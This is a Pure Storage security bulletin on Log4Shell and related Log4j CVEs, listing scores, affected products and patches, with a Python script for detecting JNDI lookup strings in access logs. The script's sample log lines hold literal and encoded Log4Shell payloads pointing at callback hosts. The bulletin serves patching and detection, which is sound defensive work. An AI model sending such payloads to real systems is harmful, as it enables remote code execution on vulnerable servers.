Security Bulletin for Log4j/Log4Shell CVE-2021-44228
This is a final statement and will be updated as necessary and included in the Pure Community Page. Multiple CVEs are addressed in this document related to Log4j / Log4Shell.
Product Resolution Guides
- Pure Resolution FAQ
- Portworx - Log4j Solution
- FlashArray - Log4j Solution
- FlashBlade - Log4j Solution
- CBS - Log4j Solution
CVE-2021-44228
On December 9, 2021, a critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed (“vulnerability”). The vulnerability, if exploited, may result in Remote Code Execution (RCE) by logging a certain string on affected installations.
This vulnerability is being tracked as CVE-2021-44228. As stated in the CVE, “Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.” Applications that are remotely accessible, accept user input, and use Log4j (any version lower than 2.15.0) to log that input are potentially vulnerable. The CVE also states the following:
Apache Log4j versions prior to 2.15.0 are susceptible to a vulnerability that when successfully exploited could allow an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
CVSS Base Scores
Product | CVSS Base Score | CVSS v3.0 Vector |
---|---|---|
FlashArray | 9.6 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
Cloud Block Store | 9.6 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
FlashBlade | 8.4 | CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |
Portworx | 7.6 | CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H |
General Mitigation Best Practices
Pure Storage recommends following network security best practices that minimize the risk of compromise due to this vulnerability including, but not limited to:
- Restrict management interfaces to a trusted set of networks. Please see Best practices on restricting public IP addresses. Additional security posture hardening may be achieved by restricting all control plane access through a jump box (bastion host).
- Restrict outbound Internet access to trusted destinations. Phone Home and Remote Assist (RA) require port 443 (https) to be open to CloudAssist subnet 52.40.255.224/27 only for outbound traffic and your firewall will need to accept inbound traffic for the established connection.
- Pure Storage strongly encourages the widely-endorsed best practice of highly restricting -- if not blocking altogether -- Internet access to administrative login interfaces, including connections via SSH, TLS, remote consoles, and remote desktop mechanisms.
- Closely monitor arrays for abnormal or unexpected workload/IO spikes or utilization as a leading indicator.
- Enable edge detection/protection mechanisms in the firewall / IDS / IPS systems to detect anomalous access or traffic patterns.
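The CVE text above describes the trigger as an attacker-controlled string reaching a vulnerable Log4j instance, and the last two bullets ask for monitoring and edge detection. The sweep below is an added example, not Pure Storage code, of what such a detection looks like in practice: it scans web-server access-log lines for the `${jndi:` lookup syntax, URL-decoding first because servers log request paths percent-encoded, and reports the callback endpoint so it can be blocked at the egress firewall. The log lines are constructed for the example and use documentation address ranges; `callback.example` is a placeholder host.

```python
"""Sweep access logs for Log4j JNDI lookup strings (added example, not
Pure Storage code). Matches the '${jndi:<scheme>:...}' lookup syntax after
undoing percent-encoding, and extracts the callback endpoint for blocking.
"""
import re
from urllib.parse import unquote, urlsplit

# LDAP is named in the CVE text; the others are further JNDI providers that
# Log4j 2 can resolve through the same lookup.
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns")
_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*/{0,2}(?P<endpoint>[^}\s/]+)",
    re.IGNORECASE,
)


def normalise(line: str) -> str:
    """Undo up to two layers of percent-encoding (proxies often double-encode)."""
    for _ in range(2):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_lookups(line: str) -> list:
    """Return (scheme, endpoint) for each JNDI lookup found in one log line."""
    hits = []
    for m in _LOOKUP.finditer(normalise(line)):
        scheme = m.group("scheme").lower()
        if scheme in JNDI_SCHEMES:
            hits.append((scheme, m.group("endpoint")))
    return hits


def sweep(lines) -> list:
    """Scan many lines; returns dicts of line number, scheme and endpoint."""
    findings = []
    for n, line in enumerate(lines, 1):
        for scheme, endpoint in find_jndi_lookups(line):
            findings.append({"line": n, "scheme": scheme, "endpoint": endpoint})
    return findings


def egress_blocklist(findings) -> list:
    """Distinct callback hosts (port stripped) for firewall or DNS blocking."""
    # urlsplit handles both host:port and [ipv6]:port forms.
    return sorted({urlsplit("//" + f["endpoint"]).hostname for f in findings})


# Constructed sample log lines (Apache combined format). Line 2 contains the
# word 'jndi' in an ordinary path and must NOT match; lines 3-5 carry a plain,
# a percent-encoded and a double-encoded lookup respectively.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:03:14:09 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:03:15:42 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:03:15:44 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 400 0 "-" "curl/7.79"',
    '198.51.100.45 - - [10/Dec/2021:03:16:01 +0000] "GET /?x=%2524%257Bjndi%253Armi%253A%252F%252Fcallback.example%253A1099%252Fx%257D HTTP/1.1" 400 0 "-" "curl/7.79"',
]


if __name__ == "__main__":
    found = sweep(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']}: {f['scheme']} lookup to {f['endpoint']}")
    print("egress blocklist:", egress_blocklist(found))
```

The decode-before-match step is the part most ad hoc greps miss: a percent-encoded lookup in a request path is still decoded by the application before Log4j sees it, so the raw access log never shows the literal `${jndi:` text. Feed real log files to `sweep()` line by line and forward the blocklist to the firewall rule that already restricts outbound traffic to trusted destinations.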
Affected Versions
Product | Affected Version(s) |
---|---|
FlashArray | |
FlashBlade | |
Cloud Block Store | |
Portworx | |
Pure Storage Orchestrator (PSO) | NOT affected by CVE-2021-44228, CVE-2021-45046, CVE-2021-45105. |
Pure Storage ActiveCluster On-Premises Mediator | NOT affected by CVE-2021-44228, CVE-2021-45046, CVE-2021-45105. |
Fixed Versions & Mitigation Options
The following fixes are now available.
Product | Type | Version | Notes |
---|---|---|---|
FlashArray | Self-Service Patch | | Online, non-disruptive patch to address the Log4j vulnerability, delivered via Pure1. See FlashArray - Log4j Solution for more details. |
FlashArray | Manual Patch | | Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services. |
FlashArray | Purity Upgrade | All | Upgrades to the following versions of Purity//FA contain a permanent fix for Log4j: |
Cloud Block Store | Purity Upgrade | All | Upgrades to the following versions contain a permanent fix for Log4j: See CBS - Log4j Solution for more details. |
FlashBlade | Self-Service Patch | | Online, non-disruptive patch to address the Log4j vulnerability, delivered via Pure1. See FlashBlade - Log4j Solution for more details. |
FlashBlade | Manual Patch | | Online, non-disruptive patch to address the Log4j vulnerability, administered by Pure Storage Global Technical Services. |
FlashBlade | Purity Upgrade | All | Upgrades to the following versions of Purity//FB contain a permanent fix for Log4j: |
Portworx | CCM Service Upgrade | ccm-service:3.0.8 | Portworx CCM container release incorporating Apache Log4j v2.16.0 (fixes in ccm-service:3.0.8). See Portworx - Log4j Solution for more details. |
Pure VM Analytics OVA Collector | Upgrade | VMA collector v3.1.4 | VMA collector v3.1.4 with the fixes is now available. Please refer to Upgrading Collectors for additional details. |
Pure1 | N/A | N/A | Pure1 infrastructure has been successfully updated with the appropriate fixes. |
CVE-2021-45046
On Tuesday 14 December, 2021, CVE-2021-45046 was released. It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations.
Pure Storage has completed evaluating implications of CVE-2021-45046 against all products.
- FlashBlade, FlashArray, Cloud Block Store are not affected by CVE-2021-45046.
- Portworx: Portworx is not affected by CVE-2021-45046. However, Portworx CCM container release incorporating Apache Log4j v2.16.0 fixes in ccm-service:3.0.8 is now available.
- Pure VM Analytics OVA Collector: VMA collector v3.1.4 is now GA. New VM Analytics Collector OVA installations and upgrades will automatically receive VMA collector v3.1.4, which includes CCM v1.8.6 incorporating Apache Log4j v2.16.0; see Instructions For Updating Pure VMC OVA Collector. (NOTE: 3.3.1 is the common OVA version. Once installed, it will download VMA collector version 3.1.4.)
CVE-2021-45105
Pure Storage is aware of the Apache Security Vulnerability CVE-2021-45105 posted Saturday, 18-DEC-2021. Pure Storage has assessed all Pure product families against this vulnerability. FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.
CVE-2021-44832
Pure Storage is aware of the Apache Security Vulnerability CVE-2021-44832 posted Monday, 27-DEC-2021. Pure Storage has assessed all Pure product families against this vulnerability. FlashArray, FlashBlade, Cloud Block Store, Portworx, Pure1, and VM Analytics Collector are not affected by this vulnerability.
Contacting Support
If you would like one of our engineers to assist you with this issue please call +1(866) 244-7121. If calling from outside the US here is a list of phone numbers: https://support.purestorage.com/Pure1/Support.